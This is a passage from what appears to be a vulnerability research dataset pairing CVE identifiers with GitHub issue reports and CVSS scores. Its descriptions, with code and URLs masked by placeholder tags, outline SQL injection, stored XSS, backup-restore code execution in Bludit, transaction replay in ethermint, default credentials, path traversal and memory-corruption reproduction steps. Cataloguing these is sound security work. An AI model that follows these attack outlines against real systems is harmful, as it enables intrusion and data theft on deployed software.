  63610. },
  63611. {
  63612. "CVE_ID": "CVE-2021-25746",
  63613. "Issue_Url_old": "https://github.com/kubernetes/ingress-nginx/issues/8503",
  63614. "Issue_Url_new": "https://github.com/kubernetes/ingress-nginx/issues/8503",
  63615. "Repo_new": "kubernetes/ingress-nginx",
  63616. "Issue_Created_At": "2022-04-22T16:18:27Z",
  63617. "description": "Placeholder.",
  63618. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
  63619. "severity": "HIGH",
  63620. "baseScore": 7.1,
  63621. "impactScore": 4.2,
  63622. "exploitabilityScore": 2.8
  63623. },
  63624. {
  63625. "CVE_ID": "CVE-2021-25783",
  63626. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/5",
  63627. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/5",
  63628. "Repo_new": "taogogo/taocms",
  63629. "Issue_Created_At": "2021-01-05T06:47:47Z",
  63630. "description": "There is SQL blind injection at APITAG APITAG administrator authority). First, we enter the background and use the column administrator admin1 we created: FILETAG We click in order and grab packets: FILETAG FILETAG There is a SQL blind injection vulnerability in the location of name: FILETAG FILETAG PATHTAG",
  63631. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  63632. "severity": "HIGH",
  63633. "baseScore": 7.2,
  63634. "impactScore": 5.9,
  63635. "exploitabilityScore": 1.2
  63636. },
  63637. {
  63638. "CVE_ID": "CVE-2021-25784",
  63639. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/4",
  63640. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/4",
  63641. "Repo_new": "taogogo/taocms",
  63642. "Issue_Created_At": "2021-01-05T06:45:53Z",
  63643. "description": "There is SQL blind injection at APITAG APITAG administrator authority). First, we enter the background and use the column administrator admin1 we created: FILETAG We click in order and grab packets: FILETAG FILETAG There is a blind SQL injection vulnerability in the location of id: FILETAG FILETAG FILETAG PATHTAG",
  63644. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  63645. "severity": "HIGH",
  63646. "baseScore": 7.2,
  63647. "impactScore": 5.9,
  63648. "exploitabilityScore": 1.2
  63649. },
  63650. {
  63651. "CVE_ID": "CVE-2021-25785",
  63652. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/3",
  63653. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/3",
  63654. "Repo_new": "taogogo/taocms",
  63655. "Issue_Created_At": "2021-01-05T06:42:31Z",
  63656. "description": "There is a storage type cross site scripting attack at APITAG APITAG administrator authority). First, we enter the background and use the column administrator admin1 we created: FILETAG Let's click \"add article\" on the left: URLTAG FILETAG Wow! FILETAG POC: FILETAG APITAG",
  63657. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  63658. "severity": "MEDIUM",
  63659. "baseScore": 4.8,
  63660. "impactScore": 2.7,
  63661. "exploitabilityScore": 1.7
  63662. },
  63663. {
  63664. "CVE_ID": "CVE-2021-25808",
  63665. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1298",
  63666. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1298",
  63667. "Repo_new": "bludit/bludit",
  63668. "Issue_Created_At": "2021-01-05T10:41:41Z",
  63669. "description": "Bludit NUMBERTAG Code Execution Vulnerability in APITAG Hi,I found a code execution vulnerability in Bludit NUMBERTAG admin panel the path is PATHTAG NUMBERTAG Log in to the admin panel FILETAG NUMBERTAG Click the backups button FILETAG NUMBERTAG Making evil backup zip First download a backup FILETAG then use this zip to modify Place FILETAG file in path PATHTAG FILETAG FILETAG Package NUMBERTAG as FILETAG FILETAG Execute the script to generate the md5 for the .BLUDIT_BACKUP FILETAG NUMBERTAG upload the evil backup zip FILETAG NUMBERTAG Click the restore backup button FILETAG NUMBERTAG Access the evil file PATHTAG FILETAG",
  63670. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  63671. "severity": "HIGH",
  63672. "baseScore": 7.8,
  63673. "impactScore": 5.9,
  63674. "exploitabilityScore": 1.8
  63675. },
  63676. {
  63677. "CVE_ID": "CVE-2021-25834",
  63678. "Issue_Url_old": "https://github.com/cosmos/ethermint/issues/686",
  63679. "Issue_Url_new": "https://github.com/cosmos/ethermint/issues/686",
  63680. "Repo_new": "cosmos/ethermint",
  63681. "Issue_Created_At": "2021-01-06T02:39:29Z",
  63682. "description": "Weak noncecheck lead to replay of transactions. Vulnerability Overview: Since there is no explicit NUMBERTAG limit on the nonce check used by ethermint, this results in transactions passing the antehandler checksum as long as they are greater than the node\u2019s cached nonce. If the victim sends a very large nonce transaction, the attacker can replay the transaction. Details and Root Cause: First, we found some ground truths: As long as the APITAG is larger than the current node\u2019s cache nonce, it will pass both noncecheck. Signaturecheck uses the nonce field of the transaction itself, so transactions larger than the current cached nonce can still pass signaturecheck. Thus, if a msg have a large nonce,then it can be replaied. Steps to Exploit: Suppose the victim sends a nonce that is much larger than the current node\u2019s cache. An attacker can replay this transaction.",
  63683. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  63684. "severity": "HIGH",
  63685. "baseScore": 7.5,
  63686. "impactScore": 3.6,
  63687. "exploitabilityScore": 3.9
  63688. },
  63689. {
  63690. "CVE_ID": "CVE-2021-25835",
  63691. "Issue_Url_old": "https://github.com/cosmos/ethermint/issues/687",
  63692. "Issue_Url_new": "https://github.com/cosmos/ethermint/issues/687",
  63693. "Repo_new": "cosmos/ethermint",
  63694. "Issue_Created_At": "2021-01-06T03:01:00Z",
  63695. "description": "Replay Tx on another Chain. Vulnerability Overview: Since ethermint uses the same type of APITAG for ethereum compatibility, a verified signature in ethereum is still valid in ethermint with the same msg content and APITAG which enables \"cross chain transaction replay\" attack etc. Details and Root Cause: First, we found some ground truths NUMBERTAG Both ethermint and ethereum have the same signature scheme NUMBERTAG User has the same public key and private key on ethermint and ethereum NUMBERTAG Different APITAG can be parsed to a same APITAG such as \"ethereum NUMBERTAG and \"erhermint NUMBERTAG Thus, if a msg successfully executed on ethereum of some APITAG say NUMBERTAG mainnet), then it can be replaied on ethermint of the same APITAG (with the nonce check passed), and vice versa. Steps to Exploit NUMBERTAG Suppose that there are two chains. One's APITAG is APITAG NUMBERTAG the other is APITAG APITAG victim have accounts on both chains with the same public key (private key NUMBERTAG The victim transfer NUMBERTAG eth to the attacker,and the victim's APITAG on APITAG NUMBERTAG is NUMBERTAG The victim's APITAG on APITAG NUMBERTAG is NUMBERTAG or less than APITAG the previously mentioned vulnerability can greatly reduce the difficulty of exploiting this vulnerability only need to meet the nonce of the replayed chain than the nonce of the replayed chain can be low NUMBERTAG The attacker replay the APITAG on APITAG NUMBERTAG",
  63696. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  63697. "severity": "HIGH",
  63698. "baseScore": 7.5,
  63699. "impactScore": 3.6,
  63700. "exploitabilityScore": 3.9
  63701. },
  63702. {
  63703. "CVE_ID": "CVE-2021-25836",
  63704. "Issue_Url_old": "https://github.com/cosmos/ethermint/issues/667",
  63705. "Issue_Url_new": "https://github.com/cosmos/ethermint/issues/667",
  63706. "Repo_new": "cosmos/ethermint",
  63707. "Issue_Created_At": "2020-12-21T14:41:21Z",
  63708. "description": "There may be dirty data when exec evm transaction with multi msgs. APITAG info:__ APITAG Ethermint commit, operating system name, and other relevant details] branch development APITAG info:__ APITAG gist of relevant config, logs, etc.] The storage data and code from APITAG are written to the keeper at the time of the handler and are cleared at the endblock stage. If there are NUMBERTAG msgs in a tx, in the APITAG (handler) stage, where msg1 executes successfully and msg2 fails, then all store data will be rolled back. However, the storage data in APITAG and the code are still Reserved, if another t NUMBERTAG is executed later in the APITAG phase, the dirty data from t NUMBERTAG will be used",
  63709. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  63710. "severity": "HIGH",
  63711. "baseScore": 7.5,
  63712. "impactScore": 3.6,
  63713. "exploitabilityScore": 3.9
  63714. },
  63715. {
  63716. "CVE_ID": "CVE-2021-25863",
  63717. "Issue_Url_old": "https://github.com/open5gs/open5gs/issues/764",
  63718. "Issue_Url_new": "https://github.com/open5gs/open5gs/issues/764",
  63719. "Repo_new": "open5gs/open5gs",
  63720. "Issue_Created_At": "2021-01-15T11:49:05Z",
  63721. "description": "Security flaw in default configuration of webui. Details The configuration of webui might result in the control panel being taken over by arbitrary user via default username and password. The lines of code below indicate that, if not specified, the server will listen on APITAG , which means the control panel could be accessed via WAN. CODETAG On APITAG , the code will create a default account APITAG , if there isn't any account specified in APITAG ERRORTAG Proof of Concept After doing a query via Zoomeye, a search engine that lets the user find specific types of computers (webcams, routers, servers, etc.) connected to the internet using a variety of filters, several valid cases have been found: CODETAG FILETAG Suggestion The default account should never be assigned.",
  63722. "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  63723. "severity": "HIGH",
  63724. "baseScore": 8.8,
  63725. "impactScore": 5.9,
  63726. "exploitabilityScore": 2.8
  63727. },
  63728. {
  63729. "CVE_ID": "CVE-2021-25864",
  63730. "Issue_Url_old": "https://github.com/Foddy/node-red-contrib-huemagic/issues/217",
  63731. "Issue_Url_new": "https://github.com/foddy/node-red-contrib-huemagic/issues/217",
  63732. "Repo_new": "foddy/node-red-contrib-huemagic",
  63733. "Issue_Created_At": "2021-01-17T11:35:47Z",
  63734. "description": "Security bug in FILETAG . Describe the bug The APITAG API, errorly used in file APITAG , introduces a Path Traversal vulnerability. URLTAG APITAG Flow to Reproduce Since the path isn't protected by APITAG API. The attacker could fetch arbitrary file on the server. APITAG Expected behavior To fix this vulerability, option of the APITAG should be specified correctly. APITAG",
  63735. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  63736. "severity": "HIGH",
  63737. "baseScore": 7.5,
  63738. "impactScore": 3.6,
  63739. "exploitabilityScore": 3.9
  63740. },
  63741. {
  63742. "CVE_ID": "CVE-2021-25987",
  63743. "Issue_Url_old": "https://github.com/hexojs/hexo/issues/4838",
  63744. "Issue_Url_new": "https://github.com/hexojs/hexo/issues/4838",
  63745. "Repo_new": "hexojs/hexo",
  63746. "Issue_Created_At": "2021-12-14T19:12:15Z",
  63747. "description": "Announcement: About CVETAG . Hexo team is already aware of the CVETAG , and we have already implemented a fix APITAG PR URLTAG However, we will not release a minor version. The fix will be included in the next major version of Hexo (which will be NUMBERTAG The fix (which will enable HTML entities escaping by default) is considered as a breaking change and we notice that it could break many current themes. Also, you should be aware that, Hexo is only a static site generator. It only generates static HTML from the source from your local computer (or your server). It is impossible for anyone other than you to modify your hexo theme or your blog post without physical access to your computer or login to your server. That's to say, in order for anyone to perform an attack based on the CVETAG , the hacker will have to hack into your computer or your server to modify your blog posts . But if that really happens (your local computer or server being compromised), the hacker can basically do anything anyway. If you host the source code of your Hexo site on a server and use some kind of web editor (like APITAG ), it is possible for hackers to modify your post through such a web editor (without login to your server). We recommend you to use some kind of authentication to protect your web editor (which you should always have even without this CVE. You don't want anybody to modify your post, right?). APITAG we mentioned earlier has a built in username & password configuration in the first day (so you will not be affected if you use a strong password). In short, it is not a Stored XSS or a Reflect XSS. It is a Self XSS APITAG XSS yourself, or a hacker to hack into your computer or server to perform the XSS attack). And your website will work flawlessly and sound even without we release a fix.",
  63748. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  63749. "severity": "MEDIUM",
  63750. "baseScore": 4.6,
  63751. "impactScore": 2.7,
  63752. "exploitabilityScore": 1.5
  63753. },
  63754. {
  63755. "CVE_ID": "CVE-2021-26194",
  63756. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4445",
  63757. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4445",
  63758. "Repo_new": "jerryscript-project/jerryscript",
  63759. "Issue_Created_At": "2021-01-11T13:28:31Z",
  63760. "description": "heap use after free in ecma_is_lexical_environment. APITAG revision fdaacde6 Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Execution steps APITAG Output ERRORTAG Credits: Found by chong from OWL NUMBERTAG",
  63761. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  63762. "severity": "MEDIUM",
  63763. "baseScore": 6.5,
  63764. "impactScore": 3.6,
  63765. "exploitabilityScore": 2.8
  63766. },
  63767. {
  63768. "CVE_ID": "CVE-2021-26195",
  63769. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4442",
  63770. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4442",
  63771. "Repo_new": "jerryscript-project/jerryscript",
  63772. "Issue_Created_At": "2021-01-11T13:04:23Z",
  63773. "description": "heap buffer overflow in lexer_parse_number. APITAG revision fdaacde Build platform Ubuntu NUMBERTAG APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG Output ERRORTAG Credits: Found by chong from OWL NUMBERTAG",
  63774. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  63775. "severity": "HIGH",
  63776. "baseScore": 8.8,
  63777. "impactScore": 5.9,
  63778. "exploitabilityScore": 2.8
  63779. },
  63780. {
  63781. "CVE_ID": "CVE-2021-26197",
  63782. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4403",
  63783. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4403",
  63784. "Repo_new": "jerryscript-project/jerryscript",
  63785. "Issue_Created_At": "2021-01-02T14:31:59Z",
  63786. "description": "SEGV in APITAG APITAG revision NUMBERTAG faafa4 Build platform Ubuntu NUMBERTAG APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: Found by chong from OWL NUMBERTAG",
  63787. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  63788. "severity": "MEDIUM",
  63789. "baseScore": 6.5,
  63790. "impactScore": 3.6,
  63791. "exploitabilityScore": 2.8
  63792. },
  63793. {
  63794. "CVE_ID": "CVE-2021-26198",
  63795. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4402",
  63796. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4402",
  63797. "Repo_new": "jerryscript-project/jerryscript",
  63798. "Issue_Created_At": "2021-01-02T14:29:48Z",
  63799. "description": "SEVG in ecma_deref_bigint. APITAG revision NUMBERTAG faafa4 Build platform Ubuntu NUMBERTAG APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: Found by chong from OWL NUMBERTAG",
  63800. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  63801. "severity": "MEDIUM",
  63802. "baseScore": 6.5,
  63803. "impactScore": 3.6,
  63804. "exploitabilityScore": 2.8
  63805. },
  63806. {
  63807. "CVE_ID": "CVE-2021-26199",
  63808. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4056",
  63809. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4056",
  63810. "Repo_new": "jerryscript-project/jerryscript",
  63811. "Issue_Created_At": "2020-07-25T14:58:50Z",
  63812. "description": "heap use after free in ecma_bytecode_ref. APITAG revision da5b NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Credits: This vulnerability is detected by chong from OWL NUMBERTAG",
  63813. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  63814. "severity": "MEDIUM",
  63815. "baseScore": 6.5,
  63816. "impactScore": 3.6,
  63817. "exploitabilityScore": 2.8
  63818. },
  63819. {
  63820. "CVE_ID": "CVE-2021-26259",
  63821. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/417",
  63822. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/417",
  63823. "Repo_new": "michaelrsweet/htmldoc",
  63824. "Issue_Created_At": "2021-01-26T08:58:27Z",
  63825. "description": "APITAG heap buffer overflow on APITAG ps APITAG Hello, While fuzzing htmldoc , I found a heap buffer overflow in the APITAG ps APITAG test platform htmldoc Version NUMBERTAG git FILETAG ERRORTAG CODETAG",
  63826. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  63827. "severity": "HIGH",
  63828. "baseScore": 7.8,
  63829. "impactScore": 5.9,
  63830. "exploitabilityScore": 1.8
  63831. },
  63832. {
  63833. "CVE_ID": "CVE-2021-26528",
  63834. "Issue_Url_old": "https://github.com/cesanta/mongoose/issues/1201",
  63835. "Issue_Url_new": "https://github.com/cesanta/mongoose/issues/1201",
  63836. "Repo_new": "cesanta/mongoose",
  63837. "Issue_Created_At": "2021-01-23T13:57:54Z",
  63838. "description": "NULL pointer dereference caused by incorrect error handling of calloc in mg_http_serve_file APITAG Incorrect handling of the value returned by calloc may lead to: NULL pointer dereference and segmentation fault error in case of restrictive memory protection, near NULL pointer overwrite in case of limited memory restrictions (e.g. in embedded environments). Memory allocations are triggered during handling of each HTTP requests, so the allocation error can be caused remotely by flooding with requests until exhausting the memory. In some embedded environments near zero memory areas are used to store device configuration, so in this case such configuration can be overwritten remotely. Vulnerable code (mongoose.c NUMBERTAG struct http_data NUMBERTAG oid old_pfn_data; // Previous pfn_data NUMBERTAG FILE fp; // For static file serving NUMBERTAG oid mg_http_serve_file(struct mg_connection c, struct mg_http_message hm NUMBERTAG const char path, const char mime, const char hdrs NUMBERTAG struct http_data d = (struct http_data ) calloc NUMBERTAG sizeof( d NUMBERTAG d >fp = fp NUMBERTAG d >old_pfn_data = c >pfn_data NUMBERTAG c >pfn = static_cb NUMBERTAG c >pfn_data = d; See following recommendations for details (especially the calloc example): URLTAG The issue can be reproduced and tested using APITAG ( URLTAG Reproduction steps NUMBERTAG Install gdb NUMBERTAG Download and unpack code of APITAG ( URLTAG NUMBERTAG Remove hook files from from the APITAG directory APART from hooks_memory.c file: find APITAG name \"hooks_[acfost] [.]c\" delete NUMBERTAG Comment out the whole contents of hooks/hooks_memory.c file APART from the calloc section to disable hooks for: malloc and realloc. / / / void calloc(size_t num, size_t size); / typedef void ( calloc_func_t)(size_t num, size_t size); static void real_calloc(size_t num, size_t size) ... void calloc(size_t num, size_t size NUMBERTAG Continue with compilation of APITAG according to the manual ( URLTAG cd APITAG make NUMBERTAG Set ESAN to the path of APITAG directory export PATHTAG NUMBERTAG Download and unzip attached map APITAG NUMBERTAG Download, unzip and compile mongoose and example \"complete NUMBERTAG Download and unzip attached map APITAG FILETAG NUMBERTAG Run Mongoose \"complete\" example with APITAG in gdb using: gdb batch ex='run' ex='backtrace' args env APITAG ./example APITAG NUMBERTAG Open in the browser following URL (where APITAG is address of tested Mongoose instance): URLTAG APITAG memory operations can occur in a different sequence, actions NUMBERTAG and NUMBERTAG sometimes need to be executed multiple times.) You should receive similar output: process NUMBERTAG is executing new program: PATHTAG NUMBERTAG I APITAG NUMBERTAG accepting on URLTAG Program received signal SIGSEGV, Segmentation fault NUMBERTAG ef1 in mg_http_serve_file (c NUMBERTAG a8c0, hm NUMBERTAG fffffffdb NUMBERTAG path NUMBERTAG d4 APITAG mime NUMBERTAG c9 \"text/plain\", hdrs NUMBERTAG c8 \"\") at PATHTAG NUMBERTAG d >fp = fp NUMBERTAG ef1 in mg_http_serve_file (c NUMBERTAG a8c0, hm NUMBERTAG fffffffdb NUMBERTAG path NUMBERTAG d4 APITAG mime NUMBERTAG c9 \"text/plain\", hdrs NUMBERTAG c8 \"\") at PATHTAG NUMBERTAG e in cb (c NUMBERTAG a8c0, e NUMBERTAG ev_data NUMBERTAG fffffffdb NUMBERTAG fn_data NUMBERTAG fffffffe NUMBERTAG at APITAG NUMBERTAG in mg_call (c NUMBERTAG a8c0, e NUMBERTAG ev_data NUMBERTAG fffffffdb NUMBERTAG at PATHTAG NUMBERTAG f5 in http_cb (c NUMBERTAG a8c0, e NUMBERTAG ev_data NUMBERTAG fffffffe NUMBERTAG fn_data NUMBERTAG fffffffe NUMBERTAG at PATHTAG NUMBERTAG in mg_call (c NUMBERTAG a8c0, e NUMBERTAG ev_data NUMBERTAG fffffffe NUMBERTAG at PATHTAG NUMBERTAG e NUMBERTAG e in read_conn (c NUMBERTAG a8c0, fn NUMBERTAG dc3a APITAG ) at PATHTAG NUMBERTAG f NUMBERTAG a in mg_mgr_poll (mgr NUMBERTAG fffffffe NUMBERTAG ms NUMBERTAG at PATHTAG NUMBERTAG af3 in main () at APITAG",
  63839. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  63840. "severity": "CRITICAL",
  63841. "baseScore": 9.1,
  63842. "impactScore": 5.2,
  63843. "exploitabilityScore": 3.9
  63844. },
  63845. {
  63846. "CVE_ID": "CVE-2021-26529",
  63847. "Issue_Url_old": "https://github.com/cesanta/mongoose/issues/1203",
  63848. "Issue_Url_new": "https://github.com/cesanta/mongoose/issues/1203",
  63849. "Repo_new": "cesanta/mongoose",
  63850. "Issue_Created_At": "2021-01-23T17:58:50Z",
  63851. "description": "Out of bounds write caused by incorrect error handling of calloc in mg_tls_init APITAG Mongoose HTTPS server (compiled with APITAG support) is vulnerable to remote OOB write attack via connection request after exhausting memory pool. Incorrect handling of the value returned by calloc in mg_tls_init may lead to: out of bound write attempt and segmentation fault error in case of restrictive memory protection, near NULL pointer (at NUMBERTAG overwrite in case of limited memory restrictions (e.g. in embedded environments). Memory allocations are triggered during handling of each HTTPS requests, so the allocation error can be caused remotely by flooding with requests until exhausting the memory. In some embedded environments near zero memory areas are used to store device configuration, so in this case such configuration can be overwritten remotely. Vulnerable code (mongoose.c NUMBERTAG struct mg_tls NUMBERTAG char cafile; // CA certificate path NUMBERTAG mbedtls NUMBERTAG crt ca; // Parsed CA certificate NUMBERTAG mbedtls NUMBERTAG crt cert; // Parsed certificate NUMBERTAG mbedtls_ssl_context ssl; // SSL/TLS context NUMBERTAG mbedtls_ssl_config conf; // SSL TLS config NUMBERTAG mbedtls_pk_context pk; // Private key context NUMBERTAG int mg_tls_init(struct mg_connection c, struct mg_tls_opts opts NUMBERTAG struct mg_tls tls = (struct mg_tls ) calloc NUMBERTAG sizeof( tls)); printf(\"mg_tls_init tls = %p %ld \", tls, &(tls >ssl NUMBERTAG int rc NUMBERTAG LOG(LL_DEBUG, (\"%lu Setting TLS, CA: %s, cert: %s, key: %s\", c >id NUMBERTAG opts >ca == NULL ? \"null\" : opts >ca NUMBERTAG opts >cert == NULL ? \"null\" : opts >cert NUMBERTAG opts >certkey == NULL ? \"null\" : opts >certkey NUMBERTAG mbedtls_ssl_init(&tls >ssl NUMBERTAG mbedtls_ssl_config_init(&tls >conf NUMBERTAG mbedtls_ssl_conf_dbg(&tls >conf, debug_cb, c); See following recommendations for details (especially the calloc example): URLTAG The issue can be reproduced and tested using APITAG ( URLTAG Reproduction steps NUMBERTAG Install gdb NUMBERTAG Download and unpack code of APITAG ( URLTAG NUMBERTAG Perform compilation of APITAG according to the manual ( URLTAG cd APITAG make NUMBERTAG Set ESAN to the path of APITAG directory export PATHTAG NUMBERTAG Download and unzip attached map APITAG FILETAG NUMBERTAG Install APITAG library NUMBERTAG Download, unzip and compile mongoose example \"http restful server\" with define MBEDTLS_DIR set for APITAG directory and debug symbols ( g NUMBERTAG Run Mongoose \"http restful server\" example with APITAG in gdb using: gdb batch ex='run' ex='backtrace' args env APITAG ./example APITAG NUMBERTAG Open in the browser following URL (where APITAG is address of tested Mongoose instance): URLTAG You should receive similar output: process NUMBERTAG is executing new program: PATHTAG NUMBERTAG I APITAG Setting log level to NUMBERTAG I APITAG NUMBERTAG accepting on URLTAG Program received signal SIGSEGV, Segmentation fault NUMBERTAG ffff NUMBERTAG d0 in mbedtls_ssl_init () from PATHTAG NUMBERTAG ffff NUMBERTAG d0 in mbedtls_ssl_init () from PATHTAG NUMBERTAG fa9 in mg_tls_init (c NUMBERTAG c0, opts NUMBERTAG fffffffdbf0) at APITAG NUMBERTAG a in fn (c NUMBERTAG c0, e NUMBERTAG ev_data NUMBERTAG fn_data NUMBERTAG at APITAG NUMBERTAG df1 in mg_call (c NUMBERTAG c0, e NUMBERTAG ev_data NUMBERTAG at src/event.c NUMBERTAG fae4 in accept_conn (mgr NUMBERTAG fffffffdd NUMBERTAG lsn NUMBERTAG c0) at APITAG NUMBERTAG in mg_mgr_poll (mgr NUMBERTAG fffffffdd NUMBERTAG ms NUMBERTAG at APITAG NUMBERTAG de in main () at APITAG",
  63852. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  63853. "severity": "CRITICAL",
  63854. "baseScore": 9.1,
  63855. "impactScore": 5.2,
  63856. "exploitabilityScore": 3.9
  63857. },
  63858. {
  63859. "CVE_ID": "CVE-2021-26530",
  63860. "Issue_Url_old": "https://github.com/cesanta/mongoose/issues/1204",
  63861. "Issue_Url_new": "https://github.com/cesanta/mongoose/issues/1204",
  63862. "Repo_new": "cesanta/mongoose",
  63863. "Issue_Created_At": "2021-01-23T18:20:54Z",
  63864. "description": "Out of bounds write caused by incorrect error handling of calloc in mg_tls_init APITAG Mongoose HTTPS server (compiled with APITAG support) is vulnerable to remote OOB write attack via connection request after exhausting memory pool. Incorrect handling of the value returned by calloc in mg_tls_init may lead to: out of bound write attempt and segmentation fault error in case of restrictive memory protection, near NULL pointer overwrite in case of limited memory restrictions (e.g. in embedded environments). Memory allocations are triggered during handling of each HTTPS requests, so the allocation error can be caused remotely by flooding with requests until exhausting the memory. In some embedded environments near zero memory areas are used to store device configuration, so in this case such configuration can be overwritten remotely. Vulnerable code (mongoose.c NUMBERTAG struct mg_tls NUMBERTAG SSL_CTX ct NUMBERTAG SSL ssl NUMBERTAG int mg_tls_init(struct mg_connection c, struct mg_tls_opts opts NUMBERTAG struct mg_tls tls = (struct mg_tls ) calloc NUMBERTAG sizeof( tls)); printf(\"tls = %p %ld \", tls, (long)(&tls >ct NUMBERTAG const char id = \"mongoose NUMBERTAG static unsigned char s_initialised NUMBERTAG int rc NUMBERTAG if (!s_initialised NUMBERTAG APITAG NUMBERTAG s_initialised NUMBERTAG tls >ctx = c >is_client ? APITAG NUMBERTAG APITAG NUMBERTAG if ((tls >ssl = SSL_new(tls >ctx)) == NULL NUMBERTAG mg_error(c, \"SSL_new NUMBERTAG goto fail NUMBERTAG See following recommendations for details (especially the calloc example): URLTAG The issue can be reproduced and tested using APITAG ( URLTAG Reproduction steps NUMBERTAG Install gdb NUMBERTAG Download and unpack code of APITAG ( URLTAG NUMBERTAG Perform compilation of APITAG according to the manual ( URLTAG cd APITAG make NUMBERTAG Set ESAN to the path of APITAG directory export PATHTAG NUMBERTAG Download and unzip attached map APITAG FILETAG NUMBERTAG Install APITAG library NUMBERTAG Download, unzip and compile mongoose example \"http restful server\" with define OPENSSL_DIR set for APITAG directory and debug symbols ( g NUMBERTAG Run Mongoose \"http restful server\" example with APITAG in gdb using: gdb batch ex='run' ex='backtrace' args env APITAG ./example APITAG NUMBERTAG Open in the browser following URL (where APITAG is address of tested Mongoose instance): URLTAG You should receive similar output: process NUMBERTAG is executing new program: PATHTAG APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG NUMBERTAG I APITAG NUMBERTAG accepting on URLTAG Program received signal SIGSEGV, Segmentation fault NUMBERTAG d6a in mg_tls_init (c NUMBERTAG opts NUMBERTAG fffffffdbf0) at APITAG NUMBERTAG src/tls.c: No such file or directory NUMBERTAG d6a in mg_tls_init (c NUMBERTAG opts NUMBERTAG fffffffdbf0) at APITAG NUMBERTAG in fn (c NUMBERTAG e NUMBERTAG ev_data NUMBERTAG fn_data NUMBERTAG at APITAG NUMBERTAG d NUMBERTAG in mg_call (c NUMBERTAG e NUMBERTAG ev_data NUMBERTAG at src/event.c NUMBERTAG fa1d in accept_conn (mgr NUMBERTAG fffffffdd NUMBERTAG lsn NUMBERTAG at APITAG NUMBERTAG bd in mg_mgr_poll (mgr NUMBERTAG fffffffdd NUMBERTAG ms NUMBERTAG at APITAG NUMBERTAG bb in main () at APITAG",
  63865. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  63866. "severity": "CRITICAL",
  63867. "baseScore": 9.1,
  63868. "impactScore": 5.2,
  63869. "exploitabilityScore": 3.9
  63870. },
  63871. {
  63872. "CVE_ID": "CVE-2021-26716",
  63873. "Issue_Url_old": "https://github.com/emoncms/emoncms/issues/1652",
  63874. "Issue_Url_new": "https://github.com/emoncms/emoncms/issues/1652",
  63875. "Repo_new": "emoncms/emoncms",
  63876. "Issue_Created_At": "2021-01-27T20:28:35Z",
  63877. "description": "XSS Vulnerability. Hi, I have found a XSS in vulnerability in: PATHTAG using the parameter 'node' Proof of concept exploit: URLTAG",
  63878. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  63879. "severity": "MEDIUM",
  63880. "baseScore": 6.1,
  63881. "impactScore": 2.7,
  63882. "exploitabilityScore": 2.8
  63883. },
  63884. {
  63885. "CVE_ID": "CVE-2021-26722",
  63886. "Issue_Url_old": "https://github.com/linkedin/oncall/issues/341",
